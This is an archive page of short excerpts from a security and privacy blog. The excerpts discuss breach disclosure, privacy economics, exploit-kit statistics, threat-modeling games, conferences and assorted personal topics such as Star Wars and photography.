There’s a new study on what people would pay for privacy in apps. As reported by Techflash: A study by two University of Colorado Boulder economists, Scott Savage and Donald Waldman, found the average user would pay varying amounts for different kinds of privacy: $4.05 to conceal contact lists, $2.28 to keep their browser history […]

 

Like the birds…

Emergent Chaos has migrated.  It’s a long story, and perhaps better left untold.  Please let us know if you see issues with the new site.

 

A Mini-Review of "The Practice of Network Security Monitoring"

Recently the kind folks at No Starch Press sent me a review copy of Rich Bejtlich’s newest book The Practice of Network Security Monitoring and I can’t recommend it enough. It is well worth reading from a theory perspective, but where it really shines is digging into the nuts and bolts of building an NSM […]

 

What will the archaeologists think?

Over at the BBC, we read that the “home of Anakin Skywalker threatened by dune,” with awesome pictures: So my question is, what will archaeologists think in 1,000 years when they dig this up? How many careers will be wasted trying to link the bizarre architecture to some real culture? How many anthropologists will be […]

 

Academic job opening at Cambridge

At Light Blue Touchpaper, Ross Anderson says “We have a vacancy for a postdoc to work on the psychology of cybercrime and deception for two years from October.” I think this role has all sorts of fascinating potential, and wanted to help get the word out in my own small way.

 

Which and That

Can we just agree that “which” and “that” are pretty much interchangeable? If you’re relying on a modern audience to be able to perceive the difference in meaning between restrictive and non-restrictive clauses, you’ve pretty much already lost. Which, as they say, makes a mockery of that rule. Alternately, “That, as they say, makes a […]

 

A Very Late Book Review

I have to start off by apologizing for how very late this review is. An embarrassingly long time ago, the kind folks at No Starch Press very kindly gave me a copy of “Super Scratch Programming Adventure” to review. Scratch, for those that aren’t familiar, is a kids-oriented programming language designed by Mitchel Resnick […]

 

Google Reader Going Away

Remarkably, some software that people host on your behalf, where you have no contract or just a contract of adhesion, can change at any time. This isn’t surprising to those who study economics, as all good New School readers try to do. However, this is a reminder/request that when you move, please resubscribe to New […]

 

Google Reader Going Away

Well, the world is full of chaos, some good and some bad, and today’s bad for those of you reading via Google Reader is that it’s going the way of Altavista (can you believe it was still around?) So as you migrate away, please consider including Emergent Chaos in your migration–we’ll have new content here […]

 

WordPress Update

I’ve updated to the latest WordPress for security fixes. Please let me know if you notice problems (blogname-at-gmail-com)

 

Privacy Enhancing Technologies Registration now open

The program for the 2013 Privacy Enhancing Technologies Symposium is up, and there’s a lot of fascinating looking papers and talks. If you’re interested, registration is also open. PETS is one of my favorite conferences of the year.

 

Replacing Flickr?

So Flickr has launched a new redesign, and it’s crowded, jumbled and slow. Now on Flickr with its overlays, its fade-ins and loads, its unmoving side and top bars, Flickr’s design takes center stage, elbowing aside the photos that I’m there to see. So I’m looking for a new community site where the photo I […]

 

Workshop on the Economics of Information Security

The next Workshop on the Economics of Information Security will be held June 11-12 at Georgetown University, Washington, D.C. Many of the papers look fascinating, including “On the Viability of Using Liability to Incentivise Internet Security”, “A Behavioral Investigation of the FlipIt Game”, and “Are They Actually Any Different? Comparing 3,422 Financial Institutions’ Privacy Practices.” […]

 

TrustZone and Security Usability

Cem Paya has a really thought-provoking set of blog posts on “TrustZone, TEE and the delusion of security indicators” (part 1, part 2.) Cem makes the point that all the crypto and execution protection magic that ARM is building is limited by the question of what the human holding the phone thinks is going on. […]

 

3D-printed guns and the crypto wars

So there’s a working set of plans for the “Liberator.” It’s a working firearm you can print on a 3d printer. You can no longer get the files from the authors, whose site states: “DEFCAD files are being removed from public access at the request of the US Department of Defense Trade Controls. Until further […]

 

The Onion and Breach Disclosure

There’s an important and interesting new breach disclosure that came out yesterday. It demonstrates leadership by clearly explaining what happened and offering up lessons learned. In particular: It shows the actual phishing emails It talks about how the attackers persisted their takeover by sending a fake “reset your password” email (more on this below) It […]

 

Security Lessons From Star Wars: Breach Response

To celebrate Star Wars Day, I want to talk about the central information security failure that drives Episode IV: the theft of the plans. First, we’re talking about really persistent threats. Not like this persistence, but the “many Bothans died to bring us this information” sort of persistence. Until members of Comment Crew are going […]

 

The Plateau Effect

The Plateau Effect is a powerful law of nature that affects everyone. Learn to identify plateaus and break through any stagnancy in your life— from diet and exercise, to work, to relationships. The Plateau Effect shows how athletes, scientists, therapists, companies, and musicians around the world are learning to break through their plateaus—to turn off […]

 

A Quintet of Facebook Privacy Stories

It’s common to hear that Facebook use means that privacy is over, or no longer matters. I think that perception is deeply wrong. It’s based in the superficial notion that people making different or perhaps surprising privacy tradeoffs are never aware of what they’re doing, or that they have no regrets. Some recent stories that […]

 

Weekend Photography

An amazing shot by Philipp Schmidli of a cyclist in front of the moon. PetaPixel explains the work involved in getting that shot in “Silhouettes in a Giant Moonrise, Captured Using a 1200mm Lens.” (Thanks to Bob Blakely). Also in the realm of impressive tool use is this: Orangutan from Borneo photographed using a spear […]

 

The Psychology of Password Managers

As I think more about the way people are likely to use a password manager, I think there’s real problems with the way master passwords are set up. As I write this, I’m deeply aware that I’m risking going into a space of “it’s logical that” without proper evidence. Let’s start from the way most […]

 

The Breach Trilogy: Assume, Confirm, Discuss

We’ve been hearing for several years that we should assume breach. Many people have taken this to heart (although today’s DBIR still says it’s still months to detect those breaches). I’d like to propose (predict?) that breach as a central concept will move through phases. Each of these phases will go through a hype cycle, […]

 

The best part of exploit kits

Following up on my post on exploit kit statistics (no data? really folks?), I wanted to share a bit of a head-shaker for a Friday with way too much serious stuff going on. Sometimes, researchers obscure all the information, such as this screenshot. I have no idea who these folks think they’re protecting by destroying […]

 

1Password & Hashcat

The folks at Hashcat have some interesting observations about 1Password. The folks at 1Password have a response, and I think there’s all sorts of fascinating lessons here. The crypto conversations are interesting, but at the end of the day, a lot of security is unavoidably contributed by the master password strength. I’d like to offer […]

 

Exploit Kit Statistics

On a fairly regular basis, I come across pages like this one from SANS, which contain fascinating information taken from exploit kit control panels: There’s all sorts of interesting numbers in that picture. For example, the success rate for owning XP machines (19.61%) is three times that of Windows 7. (As an aside, the XP […]

 

Celebrating 5 Years of New School: 40% off!

Thanks to Addison Wesley, who are offering 40% off the book. Apply code NEWSCHOOL40 to get your discounted copy. (You apply the code after proceeding to checkout.)

 

By looking for evidence first, the Brits do it right

As it happens, both the US Government and the UK government are leading “cyber security standards framework” initiatives right now.  The US is using a consensus process to “incorporate existing consensus-based standards to the fullest extent possible”, including “cybersecurity standards, guidelines, frameworks, and best practices” and “conformity assessment programs”. In contrast, the UK is asking […]

 

5 Years of New School

Five years ago Friday was the official publication date of The New School of Information Security. I want to take this opportunity to look back a little and look forward to the next few years. Five years ago, fear of a breach and its consequences was nearly universal, and few people thought anything but pain […]

 

I swear, I'm just looking at the articles!

Apparently, Playboy (possibly NSFW) has an app on iTunes. However, to get an app through the censors prudes “appropriate content” editors, there’s none of Playboy’s trademark nudes. There hasn’t been such good news for their writers since the braille edition. I’ll leave the jokes to you. It’s worth thinking about this as the sanitized future […]

 

Analyzing The Army's Accidental Test

According to Wired, “Army Practices Poor Data Hygiene on Its New Smartphones, Tablets.” And I think that’s awesome. No, really, not the ironic sort of awesome, but the awesome sort of awesome, because what the Army is doing is a large scale natural experiment in “does it matter?” Over the next n months, the Pentagon’s […]

 

AdaCamp: San Francisco June 8-9

(Posted for friends) AdaCamp is a conference dedicated to increasing women’s participation in open technology and culture: open source software, Wikipedia-related projects, open data, open geo, fan fiction, remix culture, and more. The conference will be held June 8 and 9th in San Francisco. There will be two tracks at the conference: one for people […]

 

Hacking Humans at BlackHat

Hacking humans is an important step in today’s exploitation chains. From “2011 Recruitment plan.xls” to instant messenger URL delivery at the start of Aurora, the human in the loop is being exploited just as much as the machine. In fact, with the right story, you might not even need an exploit at all. So I’m […]

 

Bicycling & Risk

While everyone else is talking about APT, I want to talk about risk thinking versus outcome thinking. I have a lot of colleagues who I respect who like to think about risk in some fascinating ways. For example, there’s the Risk Hose and SIRA folks. I’m inspired by To Encourage Biking, Cities Lose the Helmets: […]

 

MD5s, IPs and Ultra

So I was listening to the Shmoocon presentation on information sharing, and there was a great deal of discussion of how sharing too much information could reveal to an attacker that they’d been detected. I’ve discussed this problem a bit in “The High Price of the Silence of Cyberwar,” but wanted to talk more about […]

 

New School Thinking At Davos

This week I have experienced an echo of this pattern at the 2013 WEF meeting. But this time my unease does not revolve around any financial threats, but another issue – cyber security. … [The] crucial point is this: even if some companies are on top of the issue, others are not, and without more […]

 

The Death Star: An Inside Job?

Here’s a Friday Star Wars video for you. As Austin Hill tweeted, “Conspiracy revealed! 7 min video that will change the way you think about one of the important events of our lifetime”

 

On Cookie Blocking

It would not be surprising if an article like “Firefox Cookie-Block Is The First Step Toward A Better Tomorrow” was written by a privacy advocate. And it may well have been. But this privacy advocate is also a former chairman of the Internet Advertising Bureau. (For their current position, see “Randall Rothenberg’s Statement Opposing Mozilla’s […]

 

New paper: "How Bad Is It? — A Branching Activity Model for Breach Impact Estimation"

Adam just posted a question about CEO “willingness to pay” (WTP) to avoid bad publicity regarding a breach event.  As it happens, we just submitted a paper to Workshop on the Economics of Information Security (WEIS) that proposes a breach impact estimation method that might apply to Adam’s question.  We use the WTP approach in a […]

 

Paying for Privacy: Enterprise Breach Edition

We all know how companies don’t want to be named after a breach. Here’s a random question: how much is that worth to a CEO? What would a given organization be willing to pay to keep its name out of the press? (A-priori, with at best a prediction of how the press will react.) Please […]

 

Lunar Orbiter Image Recovery Project

The Lunar Orbiter Image Recovery Project needs help to recover data from the Lunar Orbiter spacecraft. Frankly, it’s a bit of a disgrace that Congress funds, well, all sorts of things, over this element of our history, but that’s besides the point. Do I want to get angry, or do I want to see this […]

 

Army Calhamer to Heaven

Allan Calhamer, the inventor of the game Diplomacy, has passed away. The NYTimes has an obituary.

 

Gamifying Driving

…the new points system rates the driver’s ability to pilot the MINI with a sporty yet steady hand. Praise is given to particularly sprightly sprints, precise gear changes, controlled braking, smooth cornering and U-turns executed at well-judged speeds. For example, the system awards maximum Experience Points for upshifts carried out within the ideal rev range […]

 

Security Blogger Awards

The Security Bloggers Awards were this week at RSA! Congratulations to Naked Security (best corporate blog), Paul DotCom (best podcast), Krebs on Security (Most educational, best represents the security industry), J4VV4D’s blog (most entertaining), Andy Greenberg’s “Meet The Hackers Who Sell Spies The Tools To Crack Your PC (And Get Paid Six-Figure Fees)” and Jack […]

 

2013 PET Award for Outstanding Research in Privacy Enhancing Technologies

You are invited to submit nominations to the 2013 PET Award. The PET Award is presented annually to researchers who have made an outstanding contribution to the theory, design, implementation, or deployment of privacy enhancing technology. It is awarded at the annual Privacy Enhancing Technologies Symposium (PETS). The PET Award carries a prize of 3000 […]

 

How to Ask Good Questions at RSA

So this week is RSA, and I wanted to offer up some advice on how to engage. I’ve already posted my “BlackHat Best Practices/Survival kit.” First, if you want to ask great questions, pay attention. There are things more annoying than a question that was answered while the questioner was tweeting, but you still don’t […]

 

Is there "Room for Debate?" in Breach Disclosure?

The New York Times has a “Room for Debate” on “Should Companies Tell Us When They Get Hacked?” It currently has 4 entries, 3 of which are dramatically in favor of more disclosure. I’m personally fond of Lee Tien’s “We Need Better Notification Laws.” My personal preference is of course (ahem) fascinating to you, […]

 

HIPAA's New Breach Rules

Law firm Proskauer has published a client alert that “HHS Issues HIPAA/HITECH Omnibus Final Rule Ushering in Significant Changes to Existing Regulations.” Most interesting to me was the breach notice section: Section 13402 of the HITECH Act requires covered entities to provide notification to affected individuals and to the Secretary of HHS following the discovery […]

 

New School Blog Attacked with 0day

We were hacked again. The vuln used was 0day, and has now been patched, thanks to David Mortman and Matt Johansen, and the theme has also been updated, thanks to Rodrigo Galindez. Since we believe in practicing the transparency we preach, I wanted to discuss what happened and some options we considered. Let me dispense […]

 

Guns, Homicides and Data

I came across a fascinating post at Jon Udell’s blog, “Homicide rates in context,” which starts out with this graph of 2007 data: Jon’s post says more than I care to on this subject right now, and points out questions worth asking. As I said in my post on “Thoughts on the Tragedies of […]

 

HHS & Breach Disclosure

There’s good analysis at “HHS breach investigations badly backlogged, leaving us in the dark” To say that I am frequently frustrated by HHS’s “breach tool” would be an understatement. Their reporting form and coding often makes it impossible to know – simply by looking at their entries – what type of breach occurred. Consider this […]

 

New York Times gets Pwned, Responds all New School

So there’s a New York Times front page story on how “Hackers in China Attacked The Times for Last 4 Months.” I just listened to the NPR story with Nicole Perlroth, who closed out saying: “Of course, no company wants to come forward and voluntarily say `hey we were hacked by China, here’s how it […]

 

Breach Analysis: Data Source biases

Bob Rudis has a fascinating and important post “Once More Into The [PRC Aggregated] Breaches.” In it, he delves into the various data sources that the Privacy Rights Clearinghouse is tracking. In doing so, he makes a strong case that data source matters, or as Obi-Wan said, “Luke, you’re going to find that many of […]

 

Happy Data Privacy Day! Go check out PrivacyFix

It’s Data Privacy Day, and there may be a profusion of platitudes. But I think what we need on data privacy day are more tools to let people take control of their privacy. One way to do that is to check your privacy settings. Of course, the way settings are arranged changes over time, and […]

 

Why the Star Wars Prequels Sucked

It is a truism that the Star Wars prequels sucked. (Elsewhere, I’ve commented that the franchise being sold to Disney means someone can finally tell the tragic story of Anakin Skywalker’s seduction by the dark side.) But the issue of exactly why they sucked is complex and layered, and most of us prefer not to […]

 

Privacy and Health Care

In my post on gun control and schools, I asserted that “I worry that reducing privacy around mental health care is going to deter people who need health care from getting it.” However, I didn’t offer up any evidence for that claim. So I’d like to follow up with some details from a report that […]

 

"Cyber" Insurance and an Opportunity

There’s a fascinating article on PropertyCasualty360 “As Cyber Coverage Soars, Opportunity Clicks” (thanks to Jake Kouns and Chris Walsh for the pointer). I don’t have a huge amount to add, but wanted to draw attention to some excerpts that drew my attention: Parisi observes that pricing has also become more consistent over the past […]

 

Thoughts on the Tragedies of December 14th

I started this post on December 14th, and couldn’t finish it. I’m going to leave the opening as I wrote it then: By now, everyone has heard of the tragic school shooting in Connecticut. My heart goes out to everyone touched by the events. But this isn’t the first school shooting on a December 14th. […]

 

“The Phoenix Project” may be uncomfortable

The Phoenix Project is an important new novel, and it’s worth reading if you work in technology. As I read it, I was awfully uncomfortable with one of the characters, John. John is the information security officer in the company, and, to be frank, John does not come off well at the start of the […]

 

On Disclosure of Intrusion Events in a Cyberwar

[This guest article is by thegrugq. I’ve taken the liberty of HTML-ifying it from his original, http://pastie.org/5673568.] On Disclosure of Intrusion Events in a Cyberwar: The Nation State’s guide to STFU. In a cyberwar (such as the ongoing events on the Internet), all actors are motivated to remain silent about incidents that they detect. However, […]

 

Giant Rubber Ducks

There’s a giant rubber duck in Sydney Harbor right now: It’s apparently by Florentijn Hofman, who does this sort of thing. My only other comment? Seattle, you’re doing it wrong. Where’s our rubber duckie? Via “Sydney Festival Launches Giant Rubber Duck in the Harbor,” Pedestrian TV. (I believe there’s a typo, and the duck is […]

 

The High Price of the Silence of Cyberwar

A little ways back, I was arguing [discussing cyberwar] with thegrugq, who said “[Cyberwar] by its very nature is defined by acts of espionage, where all sides are motivated to keep incidents secret.” I don’t agree that all sides are obviously motivated to keep incidents secret, and I think that it’s worth asking, is there […]

 

Negative temperatures?

Absolute zero is often thought to be the coldest temperature possible. But now researchers show they can achieve even lower temperatures for a strange realm of “negative temperatures.” Oddly, another way to look at these negative temperatures is to consider them hotter than infinity, researchers added. (“Atoms Reach Record Temperature, Colder than Absolute Zero,” Charles […]

 

New School Thinking at the European Union

I was pretty excited to see this: An EU official said the aim of the report was to get companies to be more open about cyber attacks and help them fend off such disruption. “We want to change the culture around cyber security from one where people are sometimes afraid or ashamed to admit a […]

 

Elevation of Privilege: Drawing Developers into Threat Modeling

In the holiday spirit I wanted to share an academic-style paper on the Elevation of Privilege Threat Modeling card game (EoP_Whitepaper.pdf) The paper describes the motivation, experience and lessons learned in creating the game. As we’ve shared the game at conferences, we’ve seen people’s eyes light up at the idea of a game. We think […]

 

Information Security Risk: A Conversation with CSO

Earlier this month, I spoke with Derek Slater: In early 2008, Adam Shostack and Andrew Stewart released the book The New School of Information Security. And they launched a blog in support of the book and its message. I wondered about how Shostack perceives the state of IT risk management now, and whether he thinks […]

 

The Gavle Goat's Gone!

The Gävle goat has burned: webcam images showed how the goat quickly became fully engulfed and was completely destroyed before the fire brigade could arrive. Or you can check the webcam: http://www.merjuligavle.se/Bocken/Bockenkamera/

 

The Fog of Reporting on Cyberwar

There’s a fascinating set of claims in Foreign Affairs “The Fog of Cyberwar”: Our research shows that although warnings about cyberwarfare have become more severe, the actual magnitude and pace of attacks do not match popular perception. Only 20 of 124 active rivals — defined as the most conflict-prone pairs of states in the system […]

 

Can Science Improvise?

My friend Raquell Holmes is doing some really interesting work on using improv to unlock creativity. There are some really interesting ties between the use of games and the use of improv to get people to approach problems in a new light, and I’m bummed that I won’t be able to make this event: Monday Dec […]

 

Infosec Lessons from Mario Batali's Kitchen

There was a story recently on NPR about kitchen waste, “No Simple Recipe For Weighing Food Waste At Mario Batali’s Lupa.” Now, normally, you’d think that a story on kitchen waste has nothing to do with information security, and you’d be right. But as I half listened to the story, I realized that it in […]

 

Hoff on AWS

Hoff’s blog post “Why Amazon Web Services (AWS) Is the Best Thing To Happen To Security & Why I Desperately Want It To Succeed” is great on a whole bunch of levels. If you haven’t read it, go do that. The first thing I appreciated is that he directly confronts the possibility of his own […]

 

The Gavle Goat is Getting Ready to Burn!

The Telegraph reports that the Gavle Goat for 2012 is up, and surrounded by guards, cameras, flame retardants, and arsonists. Emergent Chaos has reporters on the ground internet, ready to report on this holiday story of a town, a goat, and an international conspiracy of drunken arsonists. Stay tuned! This year’s goat is shown in […]

 

South Carolina

It’s easy to feel sympathy for the many folks impacted by the hacking of South Carolina’s Department of Revenue. With 3.6 million taxpayer social security numbers stolen, those people are the biggest victims, and I’ll come back to them. It’s also easy to feel sympathy for the folks in IT and IT management, all the […]

 

Control-Alt-Hack: Now available from Amazon!

Amazon now has copies of Control Alt Hack, the card game that I helped Tammy Denning and Yoshi Kohno create. Complimentary copies for academics and those who won copies at Blackhat are en route. From the website: Control-Alt-Hack™ is a tabletop card game about white hat hacking, based on game mechanics by gaming powerhouse Steve […]

 

Now Available: Control Alt Hack!

Amazon now has copies of Control Alt Hack, the card game that I helped Tammy Denning and Yoshi Kohno create. Complimentary copies for academics and those who won copies at Blackhat are en route. From the website: Control-Alt-Hack™ is a tabletop card game about white hat hacking, based on game mechanics by gaming powerhouse Steve […]

 

Email Security Myths

My buddy Curt Hopkins is writing about the Petraeus case, and asked: I wonder, in addition to ‘it’s safe if it’s in the draft folder,’ how many additional technically- and legally-useless bits of sympathetic magic that people regularly use in the belief that it will save them from intrusion or discovery, either based on the […]

 

The Questions Not Asked on Passwords

So there’s a pair of stories on choosing good passwords on the New York Times. The first is (as I write this) the most emailed story on the site, “How to Devise Passwords That Drive Hackers Away.” It quotes both Paul Kocher and Jeremiah Grossman, both of whom I respect. There’s also a follow-on story, […]

 

The "Human Action" argument is not even wrong

Several commenters on my post yesterday have put forth some form of the argument that hackers are humans, humans are unpredictable, and therefore, information security cannot have a Nate Silver. This is a distraction, as a moment’s reflection will show. Muggings, rapes and murders all depend on the actions of unpredictable humans, and we can, […]

 

Where is Information Security's Nate Silver?

So by now everyone knows that Nate Silver predicted 50 out of 50 states in the 2012 election. Michael Cosentino has a great picture: Actually, he was one of many quants who predicted what was going to happen via meta-analysis of the data that was available. So here’s my question. Who’s making testable predictions of […]

 

Effective training: Wombat's USBGuru

Many times when computers are compromised, the compromise is stealthy. Take a moment to compare that to being attacked by a lion. There, the failure to notice the lion is right there, in your face. Assuming you survive, you’re going to relive that experience, and think about what you can learn from it. But in […]

 

Bleg: Canon & Apple RAW processing

I’m having a camera issue that’s become more and more noticeable with recent software changes. The raw previews coming out of the camera appear substantially more exposed than when Aperture is finished processing them. The difference is hard to measure (there’s no easy undo for raw processing), but appears to be about a full stop […]

 

Test post

Over the summer, Adam and I were talking and I said that I’d like a place to do some personal blogging as opposed to things I normally do, which are targeted at one place or another. I’d like to be able to blither about security, but also about whatever. Photography, cooking, you know, things that […]

 

Published Data Empowers

There’s a story over at Bloomberg, “Experian Customers Unsafe as Hackers Steal Credit Report Data.” And much as I enjoy picking on the credit reporting agencies, what I really want to talk about is how the story came to light. The cyberthieves broke into an employee’s computer in September 2011 and stole the password for […]

 

9.5 Theses on the Power and Efficacy of Gamification

Sebastian Deterding’s Microsoft research talk is now online: “9.5 Theses on the Power and Efficacy of Gamification”. You may recall that this talk inspired me to blog about “Running a game at work.” It’s worth an hour if you’re interested in serious games, persuasive games, or playful design.

 

I wish we had their problems

Ben Goldacre talks about how physicians are only getting data on tests that come out positive: I look forward to the day when infosec standards are set based on some tests or evidence, and we have to fight to extract more data. The talk is here: here.

 

Compliance Lessons from Lance, Redux

Not too long ago, I blogged about “Compliance Lessons from Lance.” And now, there seems to be dramatic evidence of a massive program to fool the compliance system. For example: Team doctors would “provide false declarations of medical need” to use cortisone, a steroid. When Armstrong had a positive corticosteroid test during the 1999 Tour […]

 

TSA Approach to Threat Modeling, Part 3

It’s often said that the TSA’s approach to threat modeling is to just prevent yesterday’s threats. Well, on Friday it came out that: So, here you see my flight information for my United flight from PHX to EWR. It is my understanding that this is similar to digital boarding passes issued by all U.S. Airlines; […]

 

Big Tex Burns

Something about this story just grabs me. I want to hear him saying “I am the dread pirate Roberts! I am here, but soon you will not be here!” Also, I’m sad that he wasn’t in Galve-ston. Photo by GreyChr

 

Proof of Age in UK Pilot

There’s a really interesting article by Toby Stevens at Computer Weekly, “Proof of age comes of age”: It’s therefore been fascinating to be part of a new initiative that seeks to address proof of age using a Privacy by Design approach to biometric technologies. Touch2id is an anonymous proof of age system that uses fingerprint […]

 

Running a Game at Work

Friday, I had the pleasure of seeing Sebastian Deterding speak on ‘9.5 Theses About Gamification.’ I don’t want to blog his entire talk, but one of his theses relates to “playful reframing”, and I think it says a lot to how to run a game at work, or a game tournament at a conference. In […]

 

The Boy Who Cried Cyber Pearl Harbor

There is, yet again, someone in the news talking about a cyber Pearl Harbor. I wanted to offer a few points of perspective. First, on December 6th, 1941, the United States was at peace. There were worries about the future, but no belief that a major attack was imminent, and certainly not a sneak attack. […]

 

Reporting Mistakes

In “New System for Patients to Report Medical Mistakes” the New York Times reports: The Obama administration wants consumers to report medical mistakes and unsafe practices by doctors, hospitals, pharmacists and others who provide treatment. Hospitals say they are receptive to the idea, despite concerns about malpractice liability and possible financial penalties for poor performance. […]

 

Choice Point Screening

Stamford Police said Jevene Wright, 29, created a fictitious company called “Choice Point Screening” and submitted false invoices for background checks that were submitted to Noble Americas Corporation, an energy retailer firm located in Stamford. (Patrick Barnard, “The Stamford (CT) Patch“) I don’t want to minimize the issue here. Assuming the allegations are correct, the […]

 

Follow your passion?

Growing up, we were told by guidance counselors, career advice books, the news media and others to “follow our passion.” This advice assumes that we all have a pre-existing passion waiting to be discovered. If we have the courage to discover this calling and to match it to our livelihood, the thinking goes, we’ll end […]

 

Two Models of Career Planning

There’s a fascinating interview with Mark Templeton of Citrix in the New York Times. It closes with the question of advice he gives to business students: There are two strategies for your life and career. One is paint-by-numbers and the other is connect-the-dots. I think most people remember their aunt who brought them a gift […]

 

Have you Run an Elevation of Privilege Tournament?

I got an email recently asking me if I had experience running an Elevation of Privilege tournament. I haven’t, and wanted to ask if anyone out there has done so; please share your experiences and suggestions. One element that I thought about is a scoring system to help with the tournament’s goals. For example, you […]

 

Systems Not Sith: Organizational Lessons From Star Wars

In Star Wars, the Empire is presented as a monolith. Storm Troopers, TIE Fighters and even Star Destroyers are supposedly just indistinguishable cogs in a massive military machine, single-mindedly pursuing a common goal. This is, of course, a façade – like all humans, the soldiers and Officers of the Imperial Military will each have their […]

 

Base Rate & Infosec

At SOURCE Seattle, I had the pleasure of seeing Jeff Lowder and Patrick Florer present on “The Base Rate Fallacy.” The talk was excellent, lining up the idea of the base rate fallacy, how and why it matters to infosec. What really struck me about this talk was that about a week before, I had […]

 

Lessons from Facebook's Stock Slide

So as Facebook continues to trade at a little over half of their market capitalization of 3 months ago, I think we can learn a few very interesting things. My goal here is not to pick on Facebook, but rather to see what we can take away and perhaps apply elsewhere. I think there are […]

 

What can we learn from the social engineering contest?

I was struck by the lead of Kelly Jackson Higgins’ article on the Defcon Social Engineering Contest: Walmart was the toughest nut to crack in last year’s social engineering competition at the DefCon hacker conference in Las Vegas, but what a difference a year makes: this year, the mega retailer scored the worst among the […]

 

Compliance Lessons from Lance

Recently, Lance Armstrong decided to forgo arbitration in his fight against the USADA over allegations of his use of certain performance enhancing drugs. His statement is “Full text of Armstrong statement regarding USADA arbitration.” What I found interesting about the story is the contrast between what might be termed a “compliance” mindset and a “you’re […]

 

SOURCE Seattle

I’ll be at SOURCE Seattle this week. I’m really excited to be speaking on “Security Lessons from Star Wars” at 10AM today.

 

Smashing the Future for Fun and Profit

I’d meant to post this at BlackHat. I think it’s worth sharing, even a bit later on: I’m excited to have been a part of a discussion with others who spoke at the first Blackhat: Bruce Schneier, Marcus Ranum, Jeff Moss, and Jennifer Granick. We’ve been asked to think about what the future holds, and […]

 

The Very Model of An Amateur Grammarian

I am the very model of an amateur grammarian I have a little knowledge and I am authoritarian But I make no apology for being doctrinarian We must not plummet to the verbal depths of the barbarian I’d sooner break my heart in two than sunder an infinitive And I’d disown my closest family within […]

 

One more request for help

If someone could suggest a specific way to make the blog title image work to bring you to the home page, that’d be most appreciated. Update, I think I fixed most of it. Thanks in particular to commenter “M”, who got me on the path to the fix, removing the inline CSS that the theme […]

 

Theme breakage, help?

The blog header image is repeating because of something in the stylesheets. I can’t see where the bug is. If someone can help out, I’d be much obliged. Expanded to add: It appears that there’s a computed “repeat” on the bg img which is the header, but why that repeat is being computed is unclear […]

 

Emergent Chaos: Romney/Ryan for America!

We here at Emergent Chaos have long been frustrated with the Obama Administration. Their failure to close Guantanamo, their failure to prosecute war crimes including torture, their choice to murder American citizens (never mind without due process), their invocation of the state secrets privilege, their persecution of whistleblowers, their TSA running rampant, the list of […]

 

Don't Share, Publish

I’d like to offer up a thought with regards to the latest swirl of discussion around ‘information sharing’ in security: Don’t share, publish. I want to talk about this because more and more folks are starting to question the value of information sharing frameworks and forums. Andrew and I share that skepticism in The New […]

 

Neil Armstrong, RIP

Neil Armstrong died August 25, aged 82. It’s difficult to properly memorialize this man, because, to a degree almost unheard of in our media-saturated times, he avoided the limelight. A statement by his family notes: As much as Neil cherished his privacy, he always appreciated the expressions of good will from people around the world […]

 

What story was that?

A friend is trying to track down a science fiction story in which the president had a death sentence at the end of their term. I know you’re all smart and good looking and at least one of you will know the exact author and title.

 

The Plural of Anecdote is Anecdotes

Over at Lexology.com, there’s a story which starts: Medical-data blackmail is becoming more common as more health care providers adopt electronic health records systems and store patient data digitally. (“Hackers demand ransom to keep medical records private”) The trouble with this opening sentence is that it has nothing to do with the story. It’s a […]

 

Regulations and Their Emergent Effects

There’s a fascinating story in the New York Times, “Profits on Carbon Credits Drive Output of a Harmful Gas”: [W]here the United Nations envisioned environmental reform, some manufacturers of gases used in air-conditioning and refrigeration saw a lucrative business opportunity. They quickly figured out that they could earn one carbon credit by eliminating one ton […]

 

New Species Discovered on Flickr

There’s a very cool story on NPR about “A New Species Discovered … On Flickr”. An entomologist was looking at some photos, and saw a bug he’d never seen. Check out the photographer’s site or Flickr pages. The paper is “A charismatic new species of green lacewing discovered in Malaysia (Neuroptera, Chrysopidae): the confluence of […]

 

Paul Ryan open thread

Oh, what the heck, it hasn’t been chaotic enough around here. So, I’ll give you a topic: Paul Ryan. Commentary from The Economist starts: IN THE polarised world of American politics, achieving bipartisan agreement on any topic is a rare feat nowadays. So perhaps it’s worth celebrating the fact that, had it been put to […]

 

The Problem With Pollution

National Geographic reports “Caffeinated Seas Found off U.S. Pacific Northwest.” The problem, of course, is salinity. They should totally be pumping that caffeine into somewhere we can make good use of it.

 

Your career is over after a breach? Another Myth, Busted!

I’m a big fan of learning from our experiences around breaches. Claims like “your stock will fall”, or “your customers will flee” are shown to be false by statistical analysis, and I expect we’d see the same if we looked at people losing their jobs over breaches. (We could do this, for example, via LinkedIn […]

 

Fascinating Job at PayPal

Someone reached out to me about a job that looks really interesting: The Director of Security Experience, Education & Research (SEER) will be responsible for defining the customer-facing security strategy for PayPal, define product roadmaps to enhance feature security and usability, drive customer security best practices adoption throughout our industry, and drive customer security […]

 

An Argument Against Jargon

Lately I’ve been savoring Kahneman’s “Thinking, Fast and Slow”. Kahneman is one of the originators of behavioral economics and a Nobel prize winner. The book is tremendously thought provoking, insanely well written, jargon-minimizing, and just comes together beautifully. It’s a book where you struggle with the ideas and their implications, rather than struggle through the […]

 

My BlackHat Plans

I’ll be speaking twice at BlackHat. First on the “Smashing the Future” panel with Bruce Schneier, Marcus Ranum, Jeff Moss and Jennifer Granick (10AM Wednesday, main hall). My second talk is also on Wednesday, on a new game, Control-Alt-Hack. I’ve been helping Tamara Denning and Yoshi Kohno create Control-Alt-Hack, and we’ll be speaking Wednesday at […]

 

Aitel on Social Engineering

Yesterday, Dave Aitel wrote a fascinating article “Why you shouldn’t train employees for security awareness,” arguing that money spent on training employees about awareness is wasted. While I don’t agree with everything he wrote, I submit that your opinion on this (and mine) are irrelevant. The key question is “Is money spent on security awareness […]

 

Lives, Fortunes and Sacred Honor

Around the 4th of July, some smart, public minded folks put forth a “Declaration of Internet Freedom”. And while it’s good in a motherhood and apple pie sense of good, wholesome fun for the whole family, it lacks the punch and panache of the Declaration of Independence to which men pledged their lives, fortunes and […]

 

"Quartering large bodies of armed troops among us.."

So following up on our tradition of posting the Declaration of Independence from Great Britain on the 4th, I wanted to use one of those facts submitted to a candid world to comment on goings on in…Great Britain. There, the government has decided to place anti-aircraft missiles on the roof of a residential building near […]

 

The Evolution of Information Security

A little while back, a colleague at the NSA reached out to me for an article for their “Next Wave” journal, with a special topic of the science of information security. I’m pleased with the way the article and the entire issue came out, and so I’m glad that the NSA has decided to release […]

 

we mutually pledge to each other our Lives, our Fortunes and our sacred Honor

In CONGRESS, July 4, 1776 The unanimous Declaration of the thirteen united States of America, When in the Course of human events, it becomes necessary for one people to dissolve the political bands which have connected them with another, and to assume among the powers of the earth, the separate and equal station to which […]
